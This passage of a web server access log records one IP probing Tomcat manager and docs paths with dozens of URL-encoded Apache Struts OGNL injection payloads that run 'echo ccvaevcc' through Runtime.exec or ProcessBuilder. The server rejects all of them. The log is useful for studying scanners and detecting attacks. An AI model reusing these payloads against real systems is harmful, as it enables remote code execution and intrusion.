/manager/html%25%7B%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B%22echo%22%2C%22ccvaevcc%22%7D)).redirectErrorStream(true).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B50000%5D%2C%23d.read(%23e)%2C%23f%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22)%2C%23f.getWriter().println(new%20java.lang.String(%23e))%2C%23f.getWriter().flush()%2C%23f.getWriter().close()%7D HTTP/1.0" 404 2054 208.87.206.42 - - [09/Jan/2024:13:27:55 +0100] "GET /manager/html?x=%24%7B(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec('echo%20ccvaevcc').getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23out.println(%23d)%2C%23out.close())%7D HTTP/1.0" 401 2499 208.87.206.42 - - [09/Jan/2024:13:27:56 +0100] "GET /manager/html?x=%24%7B(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec('echo%20ccvaevcc').getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23out.println(%23d)%2C%23out.close())%7D HTTP/1.0" 401 2499 208.87.206.42 - - [09/Jan/2024:13:27:58 +0100] "GET /manager/html/%24%7B%23context%5B'xwork.MethodAccessor.denyMethodExecution'%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess')%2C%23m.setAccessible(true)%2C%23m.set(%23_memberAccess%2Ctrue)%2C%23q%3D%40org.apache.commons.io.IOUtils%40toString(%40java.lang.Runtime%40getRuntime().exec('echo%20ccvaevcc').getInputStream())%2C%23q%7D.action HTTP/1.0" 401 2499 208.87.206.42 - - [09/Jan/2024:13:27:58 +0100] "GET /manager/html/%24%7B%23context%5B'xwork.MethodAccessor.denyMethodExecution'%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess')%2C%23m.setAccessible(true)%2C%23m.set(%23_memberAccess%2Ctrue)%2C%23q%3D%40org.apache.commons.io.IOUtils%40toString(%40java.lang.Runtime%40getRuntime().exec('echo%20ccvaevcc').getInputStream())%2C%23q%7D.action HTTP/1.0" 401 2499 208.87.206.42 - - [09/Jan/2024:13:27:59 +0100] "GET /manager/html?redirect%3A%24%7B3267705%2B3540816%7D HTTP/1.0" 401 2499 208.87.206.42 - - [09/Jan/2024:13:27:59 +0100] "GET /manager/html?redirect%3A%24%7B3267705%2B3540816%7D HTTP/1.0" 401 2499 208.87.206.42 - - [09/Jan/2024:13:28:00 +0100] "GET /manager/html?debug=command&expression=%23f%3D%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess')%2C%23f.setAccessible(true)%2C%23f.set(%23_memberAccess%2Ctrue)%2C%23req%3D%40org.apache.struts2.ServletActionContext%40getRequest()%2C%23resp%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B%22echo%22%2C%22ccvaevcc%22%7D)).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B1000%5D%2C%23d.read(%23e)%2C%23resp.println(%23e)%2C%23resp.close() HTTP/1.0" 401 2499 208.87.206.42 - - [09/Jan/2024:13:28:01 +0100] "GET /manager/html?debug=command&expression=%23f%3D%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess')%2C%23f.setAccessible(true)%2C%23f.set(%23_memberAccess%2Ctrue)%2C%23req%3D%40org.apache.struts2.ServletActionContext%40getRequest()%2C%23resp%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B%22echo%22%2C%22ccvaevcc%22%7D)).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B1000%5D%2C%23d.read(%23e)%2C%23resp.println(%23e)%2C%23resp.close() HTTP/1.0" 401 2499 208.87.206.42 - - [09/Jan/2024:13:28:01 +0100] "POST /manager/html HTTP/1.0" 401 2499 208.87.206.42 - - [09/Jan/2024:13:28:02 +0100] "POST /manager/html HTTP/1.0" 401 2499 208.87.206.42 - - [09/Jan/2024:13:28:03 +0100] "GET /manager/html?method:%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23context%5B%23parameters.obj%5B0%5D%5D.getWriter().print(%23parameters.content%5B0%5D%2B602%2B53718),1?%23xx:%23request.toString&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=10086 HTTP/1.0" 401 2499 208.87.206.42 - - [09/Jan/2024:13:28:04 +0100] "GET /manager/html?method:%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23context%5B%23parameters.obj%5B0%5D%5D.getWriter().print(%23parameters.content%5B0%5D%2B602%2B53718),1?%23xx:%23request.toString&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=10086 HTTP/1.0" 401 2499 208.87.206.42 - - [09/Jan/2024:13:28:06 +0100] "GET /manager/html/%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23wr%3D%23context%5B%23parameters.obj%5B0%5D%5D.getWriter(),%23wr.print(%23parameters.content%5B0%5D%2B602%2B53718),%23wr.close(),xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=10086 HTTP/1.0" 401 2499 208.87.206.42 - - [09/Jan/2024:13:28:07 +0100] "GET /manager/html/%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23wr%3D%23context%5B%23parameters.obj%5B0%5D%5D.getWriter(),%23wr.print(%23parameters.content%5B0%5D%2B602%2B53718),%23wr.close(),xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=10086 HTTP/1.0" 401 2499 208.87.206.42 - - [09/Jan/2024:13:28:07 +0100] "GET /manager/html/(%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3F(%23wr%3D%23context%5B%23parameters.obj%5B0%5D%5D.getWriter(),%23rs%3D@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command%5B0%5D).getInputStream()),%23wr.println(%23rs),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=16456&command=echo%20ccvaevcc HTTP/1.0" 401 2499 208.87.206.42 - - [09/Jan/2024:13:28:08 +0100] "POST /manager/html HTTP/1.0" 401 2499 208.87.206.42 - - [09/Jan/2024:13:28:08 +0100] "POST /manager/html HTTP/1.0" 401 2499 208.87.206.42 - - [09/Jan/2024:13:28:09 +0100] "POST /manager/html HTTP/1.0" 401 2499 208.87.206.42 - - [09/Jan/2024:13:28:09 +0100] "POST /manager/html HTTP/1.0" 401 2499 208.87.206.42 - - [09/Jan/2024:13:28:10 +0100] "POST /manager/html HTTP/1.0" 401 2499 208.87.206.42 - - [09/Jan/2024:13:28:11 +0100] "GET /manager/html?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3F(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command%5B0%5D).getInputStream()))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=echo%20ccvaevcc HTTP/1.0" 401 2499 208.87.206.42 - - [09/Jan/2024:13:28:11 +0100] "GET /manager/html/%24%7B1489176%2B7778769%7D/index.action HTTP/1.0" 401 2499 208.87.206.42 - - [09/Jan/2024:13:28:12 +0100] "GET /manager/html HTTP/1.0" 401 2499 208.87.206.42 - - [09/Jan/2024:13:28:14 +0100] "POST /docs/manager-howto.html HTTP/1.0" 404 745 208.87.206.42 - - [09/Jan/2024:13:28:17 +0100] "POST /docs/manager-howto.html HTTP/1.0" 404 745 208.87.206.42 - - [09/Jan/2024:13:28:19 +0100] "GET /docs/manager-howto.html?%28%27%5Cu0023context%5B%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27%5D%5Cu003dfalse%27%29%28bla%29%28bla%29&%28%27%5Cu0023_memberAccess.excludeProperties%5Cu003d@java.util.Collections@EMPTY_SET%27%29%28kxlzx%29%28kxlzx%29&%28%27%5Cu0023mycmd%5Cu003d%5C%27echo%20ccvaevcc%5C%27%27%29%28bla%29%28bla%29&%28%27%5Cu0023myret%5Cu003d@java.lang.Runtime@getRuntime%28%29.exec%28%5Cu0023mycmd%29%27%29%28bla%29%28bla%29&%28A%29%28%28%27%5Cu0023mydat%5Cu003dnew%5C40java.io.DataInputStream%28%5Cu0023myret.getInputStream%28%29%29%27%29%28bla%29%29&%28B%29%28%28%27%5Cu0023myres%5Cu003dnew%5C40byte%5B51020%5D%27%29%28bla%29%29&%28C%29%28%28%27%5Cu0023mydat.readFully%28%5Cu0023myres%29%27%29%28bla%29%29&%28D%29%28%28%27%5Cu0023mystr%5Cu003dnew%5C40java.lang.String%28%5Cu0023myres%29%27%29%28bla%29%29&%28%27%5Cu0023myout%5Cu003d@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28bla%29%28bla%29&%28E%29%28%28%27%5Cu0023myout.getWriter%28%29.println%28%5Cu0023mystr%29%27%29%28bla%29%29 HTTP/1.0" 404 745 208.87.206.42 - - [09/Jan/2024:13:28:19 +0100] "GET /docs/manager-howto.html?%28%27%5Cu0023context%5B%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27%5D%5Cu003dfalse%27%29%28bla%29%28bla%29&%28%27%5Cu0023_memberAccess.excludeProperties%5Cu003d@java.util.Collections@EMPTY_SET%27%29%28kxlzx%29%28kxlzx%29&%28%27%5Cu0023mycmd%5Cu003d%5C%27echo%20ccvaevcc%5C%27%27%29%28bla%29%28bla%29&%28%27%5Cu0023myret%5Cu003d@java.lang.Runtime@getRuntime%28%29.exec%28%5Cu0023mycmd%29%27%29%28bla%29%28bla%29&%28A%29%28%28%27%5Cu0023mydat%5Cu003dnew%5C40java.io.DataInputStream%28%5Cu0023myret.getInputStream%28%29%29%27%29%28bla%29%29&%28B%29%28%28%27%5Cu0023myres%5Cu003dnew%5C40byte%5B51020%5D%27%29%28bla%29%29&%28C%29%28%28%27%5Cu0023mydat.readFully%28%5Cu0023myres%29%27%29%28bla%29%29&%28D%29%28%28%27%5Cu0023mystr%5Cu003dnew%5C40java.lang.String%28%5Cu0023myres%29%27%29%28bla%29%29&%28%27%5Cu0023myout%5Cu003d@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28bla%29%28bla%29&%28E%29%28%28%27%5Cu0023myout.getWriter%28%29.println%28%5Cu0023mystr%29%27%29%28bla%29%29 HTTP/1.0" 404 745 208.87.206.42 - - [09/Jan/2024:13:28:20 +0100] "GET /docs/manager-howto.html?%28%27%5Cu0023context%5B%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27%5D%5Cu003dfalse%27%29%28bla%29%28bla%29&%28%27%5Cu0023_memberAccess.excludeProperties%5Cu003d@java.util.Collections@EMPTY_SET%27%29%28kxlzx%29%28kxlzx%29&%28%27%5Cu0023_memberAccess.allowStaticMethodAccess%5Cu003dtrue%27%29%28bla%29%28bla%29&%28%27%5Cu0023mycmd%5Cu003d%5C%27echo%20ccvaevcc%5C%27%27%29%28bla%29%28bla%29&%28%27%5Cu0023myret%5Cu003d@java.lang.Runtime@getRuntime%28%29.exec%28%5Cu0023mycmd%29%27%29%28bla%29%28bla%29&%28A%29%28%28%27%5Cu0023mydat%5Cu003dnew%5C40java.io.DataInputStream%28%5Cu0023myret.getInputStream%28%29%29%27%29%28bla%29%29&%28B%29%28%28%27%5Cu0023myres%5Cu003dnew%5C40byte%5B51020%5D%27%29%28bla%29%29&%28C%29%28%28%27%5Cu0023mydat.readFully%28%5Cu0023myres%29%27%29%28bla%29%29&%28D%29%28%28%27%5Cu0023mystr%5Cu003dnew%5C40java.lang.String%28%5Cu0023myres%29%27%29%28bla%29%29&%28%27%5Cu0023myout%5Cu003d@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28bla%29%28bla%29&%28E%29%28%28%27%5Cu0023myout.getWriter%28%29.println%28%5Cu0023mystr%29%27%29%28bla%29%29 HTTP/1.0" 404 745 208.87.206.42 - - [09/Jan/2024:13:28:21 +0100] "GET /docs/manager-howto.html?%28%27%5C43_memberAccess.allowStaticMethodAccess%27%29%28a%29=true&%28b%29%28%28%27%5C43context%5B%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27%5D%5C75false%27%29%28b%29%29&%28%27%5C43c%27%29%28%28%27%5C43_memberAccess.excludeProperties%5C75@java.util.Collections@EMPTY_SET%27%29%28c%29%29&%28g%29%28%28%27%5C43mycmd%5C75%5C%27echo%20ccvaevcc%5C%27%27%29%28d%29%29&%28h%29%28%28%27%5C43myret%5C75@java.lang.Runtime@getRuntime%28%29.exec%28%5C43mycmd%29%27%29%28d%29%29&%28i%29%28%28%27%5C43mydat%5C75new%5C40java.io.DataInputStream%28%5C43myret.getInputStream%28%29%29%27%29%28d%29%29&%28j%29%28%28%27%5C43myres%5C75new%5C40byte%5B51020%5D%27%29%28d%29%29&%28k%29%28%28%27%5C43mydat.readFully%28%5C43myres%29%27%29%28d%29%29&%28l%29%28%28%27%5C43mystr%5C75new%5C40java.lang.String%28%5C43myres%29%27%29%28d%29%29&%28m%29%28%28%27%5C43myout%5C75@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28d%29%29&%28n%29%28%28%27%5C43myout.getWriter%28%29.println%28%5C43mystr%29%27%29%28d%29%29 HTTP/1.0" 404 745 208.87.206.42 - - [09/Jan/2024:13:28:21 +0100] "POST /docs/manager-howto.html HTTP/1.0" 404 745 208.87.206.42 - - [09/Jan/2024:13:28:22 +0100] "GET /docs/manager-howto.html/devmode.action?debug=command&expression=(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean%28%22false%22%29%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27echo%20ccvaevcc%27%29.getInputStream%28%29%29) HTTP/1.0" 404 764 208.87.206.42 - - [09/Jan/2024:13:28:22 +0100] "GET /docs/manager-howto.html/devmode.action?debug=command&expression=(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean%28%22false%22%29%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27echo%20ccvaevcc%27%29.getInputStream%28%29%29) HTTP/1.0" 404 764 208.87.206.42 - - [09/Jan/2024:13:28:23 +0100] "GET /docs/manager-howto.html&key=(%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D=+new+java.lang.Boolean(false),+%23_memberAccess%5B%22allowStaticMethodAccess%22%5D=true,+%23a=@java.lang.Runtime@getRuntime().exec(%27echo%20ccvaevcc%27).getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char%5B51020%5D,%23c.read(%23d),%23kxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23kxlzx.println(%23d),%23kxlzx.close())(meh)&z%5B(key)(%27meh%27)%5D HTTP/1.0" 404 1258 208.87.206.42 - - [09/Jan/2024:13:28:23 +0100] "GET /docs/manager-howto.html&key=(%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D=+new+java.lang.Boolean(false),+%23_memberAccess%5B%22allowStaticMethodAccess%22%5D=true,+%23a=@java.lang.Runtime@getRuntime().exec(%27echo%20ccvaevcc%27).getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char%5B51020%5D,%23c.read(%23d),%23kxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23kxlzx.println(%23d),%23kxlzx.close())(meh)&z%5B(key)(%27meh%27)%5D HTTP/1.0" 404 1258 208.87.206.42 - - [09/Jan/2024:13:28:24 +0100] "GET /docs/manager-howto.html%25%7B%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B%22echo%22%2C%22ccvaevcc%22%7D)).redirectErrorStream(true).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B50000%5D%2C%23d.read(%23e)%2C%23f%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22)%2C%23f.getWriter().println(new%20java.lang.String(%23e))%2C%23f.getWriter().flush()%2C%23f.getWriter().close()%7D HTTP/1.0" 404 1258 208.87.206.42 - - [09/Jan/2024:13:28:25 +0100] "GET /docs/manager-howto.html%25%7B%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B%22echo%22%2C%22ccvaevcc%22%7D)).redirectErrorStream(true).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B50000%5D%2C%23d.read(%23e)%2C%23f%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22)%2C%23f.getWriter().println(new%20java.lang.String(%23e))%2C%23f.getWriter().flush()%2C%23f.getWriter().close()%7D HTTP/1.0" 404 1258 208.87.206.42 - - [09/Jan/2024:13:28:26 +0100] "GET /docs/manager-howto.html?x=%24%7B(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec('echo%20ccvaevcc').getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23out.println(%23d)%2C%23out.close())%7D HTTP/1.0" 404 745 208.87.206.42 - - [09/Jan/2024:13:28:27 +0100] "GET /docs/manager-howto.html?x=%24%7B(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec('echo%20ccvaevcc').getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23out.println(%23d)%2C%23out.close())%7D HTTP/1.0" 404 745 208.87.206.42 - - [09/Jan/2024:13:28:29 +0100] "GET /docs/manager-howto.html/%24%7B%23context%5B'xwork.MethodAccessor.denyMethodExecution'%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess')%2C%23m.setAccessible(true)%2C%23m.set(%23_memberAccess%2Ctrue)%2C%23q%3D%40org.apache.commons.io.IOUtils%40toString(%40java.lang.Runtime%40getRuntime().exec('echo%20ccvaevcc').getInputStream())%2C%23q%7D.action HTTP/1.0" 404 1138 208.87.206.42 - - [09/Jan/2024:13:28:30 +0100] "GET /docs/manager-howto.html/%24%7B%23context%5B'xwork.MethodAccessor.denyMethodExecution'%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess')%2C%23m.setAccessible(true)%2C%23m.set(%23_memberAccess%2Ctrue)%2C%23q%3D%40org.apache.commons.io.IOUtils%40toString(%40java.lang.Runtime%40getRuntime().exec('echo%20ccvaevcc').getInputStream())%2C%23q%7D.action HTTP/1.0" 404 1138 208.87.206.42 - - [09/Jan/2024:13:28:31 +0100] "GET /docs/manager-howto.html?redirect%3A%24%7B2063629%2B8595364%7D HTTP/1.0" 404 745 208.87.206.42 - - [09/Jan/2024:13:28:31 +0100] "GET /docs/manager-howto.html?redirect%3A%24%7B2063629%2B8595364%7D HTTP/1.0" 404 745 208.87.206.42 - - [09/Jan/2024:13:28:32 +0100] "GET /docs/manager-howto.html?debug=command&expression=%23f%3D%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess')%2C%23f.setAccessible(true)%2C%23f.set(%23_memberAccess%2Ctrue)%2C%23req%3D%40org.apache.struts2.ServletActionContext%40getRequest()%2C%23resp%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B%22echo%22%2C%22ccvaevcc%22%7D)).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B1000%5D%2C%23d.read(%23e)%2C%23resp.println(%23e)%2C%23resp.close() HTTP/1.0" 404 745 208.87.206.42 - - [09/Jan/2024:13:28:34 +0100] "GET /docs/manager-howto.html?debug=command&expression=%23f%3D%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess')%2C%23f.setAccessible(true)%2C%23f.set(%23_memberAccess%2Ctrue)%2C%23req%3D%40org.apache.struts2.ServletActionContext%40getRequest()%2C%23resp%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B%22echo%22%2C%22ccvaevcc%22%7D)).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B1000%5D%2C%23d.read(%23e)%2C%23resp.println(%23e)%2C%23resp.close() HTTP/1.0" 404 745 208.87.206.42 - - [09/Jan/2024:13:28:37 +0100] "POST /docs/manager-howto.html HTTP/1.0" 404 745 208.87.206.42 - - [09/Jan/2024:13:28:37 +0100] "POST /docs/manager-howto.html HTTP/1.0" 404 745 208.87.206.42 - - [09/Jan/2024:13:28:38 +0100] "GET /docs/manager-howto.html?method:%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23context%5B%23parameters.obj%5B0%5D%5D.getWriter().print(%23parameters.content%5B0%5D%2B602%2B53718),1?%23xx:%23request.toString&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=10086 HTTP/1.0" 404 745 208.87.206.42 - - [09/Jan/2024:13:28:39 +0100] "GET /docs/manager-howto.html?method:%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23context%5B%23parameters.obj%5B0%5D%5D.getWriter().print(%23parameters.content%5B0%5D%2B602%2B53718),1?%23xx:%23request.toString&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=10086 HTTP/1.0" 404 745 208.87.206.42 - - [09/Jan/2024:13:28:39 +0100] "GET /docs/manager-howto.html/%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23wr%3D%23context%5B%23parameters.obj%5B0%5D%5D.getWriter(),%23wr.print(%23parameters.content%5B0%5D%2B602%2B53718),%23wr.close(),xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=10086 HTTP/1.0" 404 956 208.87.206.42 - - [09/Jan/2024:13:28:42 +0100] "GET /docs/manager-howto.html/%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23wr%3D%23context%5B%23parameters.obj%5B0%5D%5D.getWriter(),%23wr.print(%23parameters.content%5B0%5D%2B602%2B53718),%23wr.close(),xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=10086 HTTP/1.0" 404 956 208.87.206.42 - - [09/Jan/2024:13:28:45 +0100] "GET /docs/manager-howto.html/(%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3F(%23wr%3D%23context%5B%23parameters.obj%5B0%5D%5D.getWriter(),%23rs%3D@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command%5B0%5D).getInputStream()),%23wr.println(%23rs),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=16456&command=echo%20ccvaevcc HTTP/1.0" 404 1074 208.87.206.42 - - [09/Jan/2024:13:28:48 +0100] "POST /docs/manager-howto.html HTTP/1.0" 404 745 208.87.206.42 - - [09/Jan/2024:13:28:48 +0100] "POST /docs/manager-howto.html HTTP/1.0" 404 745 208.87.206.42 - - [09/Jan/2024:13:28:49 +0100] "POST /docs/manager-howto.html HTTP/1.0" 404 745 208.87.206.42 - - [09/Jan/2024:13:28:49 +0100] "POST /docs/manager-howto.html HTTP/1.0" 404 745 208.87.206.42 - - [09/Jan/2024:13:28:51 +0100] "POST /docs/manager-howto.html HTTP/1.0" 404 745 208.87.206.42 - - [09/Jan/2024:13:28:52 +0100] "GET /docs/manager-howto.html?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3F(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command%5B0%5D).getInputStream()))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=echo%20ccvaevcc HTTP/1.0" 404 745 208.87.206.42 - - [09/Jan/2024:13:28:53 +0100] "GET /docs/manager-howto.html/%24%7B2804795%2B5225844%7D/index.action HTTP/1.0" 404 793 208.87.206.42 - - [09/Jan/2024:13:28:53 +0100] "GET /docs/manager-howto.html HTTP/1.0" 404 745 208.87.206.42 - - [09/Jan/2024:13:28:54 +0100] "POST /host-manager/html HTTP/1.0" 401 2044 208.87.206.42 - - [09/Jan/2024:13:28:55 +0100] "POST /host-manager/html HTTP/1.0" 401 2044 208.87.206.42 - - [09/Jan/2024:13:28:55 +0100] "GET /host-manager/html?%28%27%5Cu0023context%5B%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27%5D%5Cu003dfalse%27%29%28bla%29%28bla%29&%28%27%5Cu0023_memberAccess.excludeProperties%5Cu003d@java.util.Collections@EMPTY_SET%27%29%28kxlzx%29%28kxlzx%29&%28%27%5Cu0023mycmd%5Cu003d%5C%27echo%20ccvaevcc%5C%27%27%29%28bla%29%28bla%29&%28%27%5Cu0023myret%5Cu003d@java.lang.Runtime@getRuntime%28%29.exec%28%5Cu0023mycmd%29%27%29%28bla%29%28bla%29&%28A%29%28%28%27%5Cu0023mydat%5Cu003dnew%5C40java.io.DataInputStream%28%5Cu0023myret.getInputStream%28%29%29%27%29%28bla%29%29&%28B%29%28%28%27%5Cu0023myres%5Cu003dnew%5C40byte%5B51020%5D%27%29%28bla%29%29&%28C%29%28%28%27%5Cu0023mydat.readFully%28%5Cu0023myres%29%27%29%28bla%29%29&%28D%29%28%28%27%5Cu0023mystr%5Cu003dnew%5C40java.lang.String%28%5Cu0023myres%29%27%29%28bla%29%29&%28%27%5Cu0023myout%5Cu003d@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28bla%29%28bla%29&%28E%29%28%28%27%5Cu0023myout.getWriter%28%29.println%28%5Cu0023mystr%29%27%29%28bla%29%29 HTTP/1.0" 401 2044 208.87.206.42 - - [09/Jan/2024:13:28:56 +0100] "GET /host-manager/html?%28%27%5Cu0023context%5B%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27%5D%5Cu003dfalse%27%29%28bla%29%28bla%29&%28%27%5Cu0023_memberAccess.excludeProperties%5Cu003d@java.util.Collections@EMPTY_SET%27%29%28kxlzx%29%28kxlzx%29&%28%27%5Cu0023mycmd%5Cu003d%5C%27echo%20ccvaevcc%5C%27%27%29%28bla%29%28bla%29&%28%27%5Cu0023myret%5Cu003d@java.lang.Runtime@getRuntime%28%29.exec%28%5Cu0023mycmd%29%27%29%28bla%29%28bla%29&%28A%29%28%28%27%5Cu0023mydat%5Cu003dnew%5C40java.io.DataInputStream%28%5Cu0023myret.getInputStream%28%29%29%27%29%28bla%29%29&%28B%29%28%28%27%5Cu0023myres%5Cu003dnew%5C40byte%5B51020%5D%27%29%28bla%29%29&%28C%29%28%28%27%5Cu0023mydat.readFully%28%5Cu0023myres%29%27%29%28bla%29%29&%28D%29%28%28%27%5Cu0023mystr%5Cu003dnew%5C40java.lang.String%28%5Cu0023myres%29%27%29%28bla%29%29&%28%27%5Cu0023myout%5Cu003d@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28bla%29%28bla%29&%28E%29%28%28%27%